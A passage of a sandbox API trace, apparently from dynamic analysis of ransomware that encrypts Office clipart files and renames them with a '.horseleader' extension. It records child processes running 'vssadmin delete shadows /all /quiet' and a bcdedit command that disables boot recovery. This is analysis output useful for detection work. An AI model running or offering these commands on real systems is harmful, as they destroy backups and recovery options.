hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.179] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.179] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 67 [0255.179] StrStrW (lpFirst="DD01585_.WMF", lpSrch=".txt") returned 0x0 [0255.179] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2524) returned 1 [0255.180] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9dc, lpOverlapped=0x0) returned 1 [0255.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff624, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.182] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9dc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9dc, lpOverlapped=0x0) returned 1 [0255.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.182] CloseHandle (hObject=0x158) returned 1 [0255.182] GetProcessHeap () returned 0x780000 [0255.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.182] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.horseleader") returned 79 [0255.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.horseleader")) returned 1 [0255.183] GetProcessHeap () returned 0x780000 [0255.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf93000, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4bf93000, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x914, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01586_.WMF", cAlternateFileName="")) returned 1 [0255.184] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="Windows") returned -1 [0255.184] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 67 [0255.184] StrStrIW (lpFirst="DD01586_.WMF", lpSrch=".horseleader") returned 0x0 [0255.184] lstrcmpW (lpString1="DD01586_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.184] lstrcmpW (lpString1="DD01586_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.184] lstrlenW (lpString=".testttjffg") returned 11 [0255.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 67 [0255.185] StrStrW (lpFirst="DD01586_.WMF", lpSrch=".txt") returned 0x0 [0255.185] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2324) returned 1 [0255.185] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x914, lpOverlapped=0x0) returned 1 [0255.186] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff6ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.186] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x914, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x914, lpOverlapped=0x0) returned 1 [0255.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.187] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.187] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.187] CloseHandle (hObject=0x158) returned 1 [0255.187] GetProcessHeap () returned 0x780000 [0255.187] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.187] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.horseleader") returned 79 [0255.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.horseleader")) returned 1 [0255.188] GetProcessHeap () returned 0x780000 [0255.188] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.188] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf28f0200, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf28f0200, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x4a7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01628_.WMF", cAlternateFileName="")) returned 1 [0255.188] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="Windows") returned -1 [0255.188] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 67 [0255.188] StrStrIW (lpFirst="DD01628_.WMF", lpSrch=".horseleader") returned 0x0 [0255.188] lstrcmpW (lpString1="DD01628_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.188] lstrcmpW (lpString1="DD01628_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.188] lstrlenW (lpString=".testttjffg") returned 11 [0255.188] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.188] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.188] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 67 [0255.189] StrStrW (lpFirst="DD01628_.WMF", lpSrch=".txt") returned 0x0 [0255.189] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=19068) returned 1 [0255.189] ReadFile (hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0) Thread: id = 35 os_tid = 0x904 Process: id = "2" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4816a000" os_pid = "0x830" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = " delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x324 Thread: id = 3 os_tid = 0xa9c Thread: id = 6 os_tid = 0x568 Thread: id = 8 os_tid = 0x7b8 Thread: id = 9 os_tid = 0x71c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4881c000" os_pid = "0x434" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = "\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0x7a8 [0113.792] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc50 | out: lpSystemTimeAsFileTime=0x2efc50*(dwLowDateTime=0x2cc3f2c0, dwHighDateTime=0x1d5f7c9)) [0113.792] GetCurrentProcessId () returned 0x434 [0113.792] GetCurrentThreadId () returned 0x7a8 [0113.792] GetTickCount () returned 0x114a2b6 [0113.792] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc58 | out: lpPerformanceCount=0x2efc58*=21981550621) returned 1 [0113.800] GetModuleHandleW (lpModuleName=0x0) returned 0x4abf0000 [0113.800] __set_app_type (_Type=0x1) [0113.800] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac17810) returned 0x0 [0113.800] __getmainargs (in: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610, _DoWildCard=0, _StartInfo=0x4ac1e0f4 | out: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610) returned 0 [0113.801] GetCurrentThreadId () returned 0x7a8 [0113.801] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7a8) returned 0x3c [0113.802] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0113.802] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0113.802] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.987] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.987] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efbe8 | out: phkResult=0x2efbe8*=0x0) returned 0x2 [0113.988] VirtualQuery (in: lpAddress=0x2efbd0, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb50, dwLength=0x30 | out: lpBuffer=0x2efb50*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.988] GetConsoleOutputCP () returned 0x1b5 [0113.988] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0113.989] SetConsoleCtrlHandler (HandlerRoutine=0x4ac13184, Add=1) returned 1 [0113.989] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.989] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0113.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.990] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0113.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.990] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0113.991] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.991] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0113.991] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.991] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0113.991] GetEnvironmentStringsW () returned 0x4f8b60* [0113.991] GetProcessHeap () returned 0x4e0000 [0113.992] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa7c) returned 0x4f95f0 [0113.992] FreeEnvironmentStringsW (penv=0x4f8b60) returned 1 [0113.992] GetProcessHeap () returned 0x4e0000 [0113.992] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x8) returned 0x4f89e0 [0113.992] GetEnvironmentStringsW () returned 0x4f8b60* [0113.992] GetProcessHeap () returned 0x4e0000 [0113.992] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa7c) returned 0x4fa080 [0113.993] FreeEnvironmentStringsW (penv=0x4f8b60) returned 1 [0113.993] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeaa8 | out: phkResult=0x2eeaa8*=0x44) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x18, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.993] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.994] RegCloseKey (hKey=0x44) returned 0x0 [0113.994] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeaa8 | out: phkResult=0x2eeaa8*=0x44) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeaa4*=0x4) returned 0x0 [0113.994] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeaa0, lpData=0x2eeac0, lpcbData=0x2eeaa4*=0x1000 | out: lpType=0x2eeaa0*=0x0, lpData=0x2eeac0*=0x9, lpcbData=0x2eeaa4*=0x1000) returned 0x2 [0113.995] RegCloseKey (hKey=0x44) returned 0x0 [0113.995] time (in: timer=0x0 | out: timer=0x0) returned 0x5e691d8d [0113.995] srand (_Seed=0x5e691d8d) [0113.995] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures" [0113.995] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures" [0113.995] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.996] GetProcessHeap () returned 0x4e0000 [0113.996] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x218) returned 0x4fab10 [0113.996] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4fab20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0113.996] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0113.996] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.996] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.997] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0113.997] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0113.997] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0113.997] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0113.997] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0113.997] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0113.997] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0113.997] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0113.997] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0113.997] GetProcessHeap () returned 0x4e0000 [0113.997] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f95f0 | out: hHeap=0x4e0000) returned 1 [0113.997] GetEnvironmentStringsW () returned 0x4f8b60* [0113.997] GetProcessHeap () returned 0x4e0000 [0113.997] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xa94) returned 0x4fad30 [0113.998] FreeEnvironmentStringsW (penv=0x4f8b60) returned 1 [0113.998] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.998] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.998] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0113.998] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0113.998] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0113.998] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0113.998] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0113.998] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0113.998] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0113.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0113.999] GetProcessHeap () returned 0x4e0000 [0113.999] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x5c) returned 0x4fb7d0 [0113.999] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef8b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.999] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef8b0, lpFilePart=0x2ef890 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef890*="Desktop") returned 0x25 [0113.999] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0113.999] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef5c0 | out: lpFindFileData=0x2ef5c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 